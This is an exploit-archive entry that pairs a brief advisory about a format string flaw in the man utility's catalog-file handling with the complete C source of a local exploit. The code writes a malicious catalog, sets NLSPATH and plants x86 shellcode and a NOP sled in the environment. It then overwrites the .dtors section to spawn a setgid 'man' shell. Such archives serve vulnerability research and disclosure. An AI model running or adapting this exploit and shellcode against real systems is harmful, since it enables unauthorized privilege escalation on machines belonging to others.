Man 1.5.1 - Catalog File Format String

// source: https://www.securityfocus.com/bid/7812/info

A vulnerability has been reported in the man utility. The problem is said to occur due to a format string bug when handling a catalog file. As a result, an attacker may be capable of writing arbitrary values to sensitive locations within process memory.

The successful exploitation of this issue could potentially result in a local attacker gaining elevated privileges, likely setgid 'man'. 

/* (linux)man[v1.5l]: format string exploit. *
 *                                           *
 * by: v9@fakehalo.deadpig.org / fakehalo.   *
 *                                           *
 * man v1.5l, and below, contain a format s- *
 * tring vulnerability.  the vulnerability   *
 * occurs when man uses an optional catalog  *
 * file, supplied by the NLSPATH/LANG envir- *
 * onmental variables.                       *
 *                                           *
 * this exploit takes advantage of this vul- *
 * nerability by making a fake catalog.  the *
 * n, changing the 8th catget, which is "Wh- *
 * at manual page do you want?", to "8 %.0d- *
 * &hn%.0d&hn". (0=filled in correctly :))   *
 *                                           *
 * since the environment is the closest user *
 * supplied data reached popping, the explo- *
 * it works like so:                         *
 *                                           *
 * format bug itself: "8 %.0d&hn%.0d&hn",    *
 * ENVVAR=<dtors+2><dtors><nops><shellcode>. *
 * so, the numbers used to write the address *
 * are found in the environment, making the  *
 * environment needing to be well aligned.   *
 *                                           *
 * the bug itself is located here:           *
 * gripes.c:89:vfprintf(stderr,getmsg(n),p); *
 * (getmsg() returns data from the catalog)  *
 *                                           *
 * successful exploitation will look like:   *
 * 000...000000000000000001074078752sh-2.04# *
 *                                           *
 * note: recent glibc versions unsetenv()    *
 * NLSPATH, along with other environmental   *
 * variables, when running set*id programs.  *
 * so, this exploit is limited in that rega- *
 * rd.  this is just a proof of concept any- *
 * ways.                                     *
 *********************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <pwd.h>

#define PATH "/usr/bin/man" /* man binary. */
#define NOP_AMT 4096 /* number of NOPs.    */
#define LANG_NAME "xx" /* "en", "fr", ...  */

static char x86_exec[]= /* with setgid(15); */
 "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
 "\x0f\xcd\x80\x89\x76\x08\x31\xc0\x88\x46"
 "\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
 "\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
 "\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62"
 "\x69\x6e\x2f\x73\x68\x01";

struct platform {
 unsigned short align;
 unsigned int pops;
 unsigned long dtors_addr;
 unsigned long ret_addr;
 char *exec;
};

struct platform target[2] =
{
 {
  /* alignment.                        */
  0,
  /* pops, example provided below.     */
  88,
  /* objdump -sj.dtors /usr/bin/man    */
  (0x805122c+4),
  /* generalized number, room to work. */
  0xbffffe01,
  /* shellcode, with setgid(15)        */
  x86_exec
 },
 { 0, 0, 0, 0, NULL }
};

char *setfmt(unsigned int);
char *setfmtmem(unsigned int);
char *setlang(unsigned int);
void printe(char *);

int main(int argc,char **argv){
 extern char **environ;

 if(argc<2){
  printf("(*)man[v1.5l]: format string exploit.\n"
  "(*)by: v9@fakehalo.deadpig.org / fakehalo.\n\n"
  "syntax: %s <platform>\n"
  " 0 : Compiled RH/linux 2.4.2-2.\n",argv[0]);
  exit(1);
 }
 if(atoi(argv[1])>0)
  printe("main(): invalid platform number");

 /* reset environment to ensure addresses   */
 /* are aligned.  as the pointer used is    */
 /* going to be aligned in the environment. */
 bzero((void *)&environ,sizeof(environ));
 if(!(environ=(char **)malloc(3*(sizeof(char *)))))
  printe("main(): allocation of memory error");

 /* X<alignment>=<addr+2><addr><nops><shellcode> */
 environ[0]=setfmtmem(atoi(argv[1]));

 /* NLSPATH=/path/to/lang. */
 environ[1]=setlang(atoi(argv[1]));
 environ[2]=0x0;

 if(execlp(PATH,PATH,0))
  printe("main(): failed to execute man");

 exit(0);
}
/* makes buffer: "8 %0d$hn%0d$hn" */
char *setfmt(unsigned int pf){
 unsigned int addrl,addrh;
 unsigned int pops=target[pf].pops;
 unsigned long addr=target[pf].ret_addr;
 char *buf;

 addrh=(addr&0xffff0000)>>16;
 addrl=(addr&0x0000ffff);

 if(!(buf=(char *)malloc(64+1)))
  printe("setfmt(): allocating memory failed");
 bzero(buf,(64+1));

 if(addrh<addrl)
  sprintf(buf,"8 %%.%dd%%%d$hn%%.%dd%%%d$hn",
  (addrh-1),pops,(addrl-addrh),(pops+1));
 else
  sprintf(buf,"8 %%.%dd%%%d$hn%%.%dd%%%d$hn",
  (addrl-1),(pops+1),(addrh-addrl),pops);

/* example of how to find amount of pops.  */
/* run the exploit with this return(),     */
/* adding "%x"'s, until you see your data. */
/* return("8 "
 "%x %x %x %x %x %x %x %x %x %x" // 10
 "%x %x %x %x %x %x %x %x %x %x" // 20
 "%x %x %x %x %x %x %x %x %x %x" // 30
 "%x %x %x %x %x %x %x %x %x %x" // 40
 "%x %x %x %x %x %x %x %x %x %x" // 50
 "%x %x %x %x %x %x %x %x %x %x" // 60
 "%x %x %x %x %x %x %x %x %x %x" // 70
 "%x %x %x %x %x %x %x %x %x %x" // 80
 "%x %x %x %x %x %x %x %x" // 8+80=88. (my box)
 "\n"); */

 return(buf);
}
/* makes buffer: <addr+2><addr><nops><shellcode> */
char *setfmtmem(unsigned int pf){
 unsigned short align=target[pf].align;
 unsigned long dtors=target[pf].dtors_addr;
 char filler[][4]={"","X","XX","XXX"};
 char taddr[3];
 char *buf;
 char *exec=target[pf].exec;

 taddr[0]=(dtors&0xff000000)>>24;
 taddr[1]=(dtors&0x00ff0000)>>16;
 taddr[2]=(dtors&0x0000ff00)>>8;
 taddr[3]=(dtors&0x000000ff);

 if(!(buf=(char *)malloc(strlen(exec)+align+
 NOP_AMT+11)))
  printe("getfmtmem(): allocating memory failed");

 bzero(buf,(strlen(exec)+align+NOP_AMT+11));
 sprintf(buf,"X%s=%c%c%c%c%c%c%c%c",
  filler[align],
  taddr[3]+2,taddr[2],taddr[1],taddr[0],
  taddr[3],taddr[2],taddr[1],taddr[0]);

 memset(buf+(10+align),0x90,NOP_AMT);
 memcpy(buf+((10+align+NOP_AMT)-strlen(exec)),
 exec,strlen(exec));

 return(buf);
}
char *setlang(unsigned int pf){
 char *langfile;
 char *langsrc;
 char *execbuf;
 char *envbuf;
 struct passwd *pwd;
 FILE *fs;

 if(!(pwd=getpwuid(getuid())))
  printe("passwd entry doesn't appear to exist");
 else{
  if(strlen(pwd->pw_dir)){
   if(!(langfile=(char *)malloc(strlen((char *)
   pwd->pw_dir)+strlen(LANG_NAME)+7)))
    printe("setlang(): allocating memory failed");
   sprintf(langfile,"%s/mess.%s",(char *)pwd->pw_dir,
   LANG_NAME);
  }
  else
   printe("passwd entry lookup failure");
 }
 if(!(langsrc=(char *)malloc(strlen(langfile)+5)))
  printe("setlang(): allocating memory failed");

 sprintf(langsrc,"%s.src",langfile);

 if(!(fs=fopen(langsrc,"w")))
  printe("setlang(): failed to write to cat file.");
 fs=fopen(langsrc,"w");
 fprintf(fs,"%s\n",setfmt(pf));
 fclose(fs);

 if(!(execbuf=(char *)malloc(strlen(langfile)+
 strlen(langsrc)+9)))
  printe("setlang(): allocating memory failed");
 sprintf(execbuf,"gencat %s %s",langfile,langsrc);

 unlink(langfile);
 system(execbuf);

 if(!(envbuf=(char *)malloc(strlen(langfile)+9)))
  printe("setlang(): allocating memory failed");
 sprintf(envbuf,"NLSPATH=%s",langfile);

 free(langfile);
 free(langsrc);
 free(execbuf);

 return(envbuf);
}
void printe(char *err){
 fprintf(stderr,"error: %s.\n",err);
 exit(0);
}